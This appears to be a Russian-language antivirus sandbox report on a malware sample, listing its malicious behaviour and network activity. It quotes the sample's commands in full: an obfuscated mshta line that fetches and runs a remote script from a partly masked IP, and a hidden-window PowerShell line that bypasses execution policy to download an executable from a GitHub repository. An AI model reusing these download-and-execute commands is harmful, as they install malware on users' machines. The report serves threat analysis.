Техническая информация
Вредоносные функции
Загружает и запускает на исполнение
- https://github.com/ecusembassy/kraken/raw/master/wordupd.exe
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\mshta.exe' vbsCRiPt:clOSE (gETobJECt ("sCRipT:http://17#.#7.68.60/druid/files/w4mm1gjiJ7st_weriuy734uii") )
Сетевая активность
TCP
Запросы HTTP GET
- http://17#.#7.68.60/druid/files/w4mm1gjiJ7st_weriuy734uii
UDP
- DNS ASK gi##ub.com
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\mshta.exe' vbsCRiPt:clOSE (gETobJECt ("sCRipT:http://17#.#7.68.60/druid/files/w4mm1gjiJ7st_weriuy734uii") )' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' "/C poweRshelL.eXE -Ex ByPasS -noP -w 1 Set-CoNtEnt -va ( nEw-objecT NEt.WEbcLieNT ).dOWNlOaDData( 'https://github.com/EcUSEmbassy/Kraken/raw/master/Wordupd.exe' ) -...' (со скрытым окном)
Запускает на исполнение
- '<SYSTEM32>\cmd.exe' "/C poweRshelL.eXE -Ex ByPasS -noP -w 1 Set-CoNtEnt -va ( nEw-objecT NEt.WEbcLieNT ).dOWNlOaDData( 'https://github.com/EcUSEmbassy/Kraken/raw/master/Wordupd.exe' ) -...
